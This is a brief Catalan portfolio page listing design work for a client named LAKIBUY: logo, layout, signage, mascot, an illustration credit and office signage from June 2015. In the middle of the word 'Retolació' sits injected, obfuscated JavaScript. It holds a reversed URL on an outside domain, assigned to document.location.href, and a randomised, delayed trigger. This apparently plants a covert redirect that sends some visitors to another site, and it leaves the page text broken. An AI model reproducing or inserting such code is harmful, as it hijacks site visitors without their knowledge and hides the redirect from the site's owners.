LAKIBUY

Logo / Maquetació / Retolació

Logotip.

Creació de mascota.

Il·lustració de Miquel Sabaté.

Retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolació de les oficines.

Juny 2015.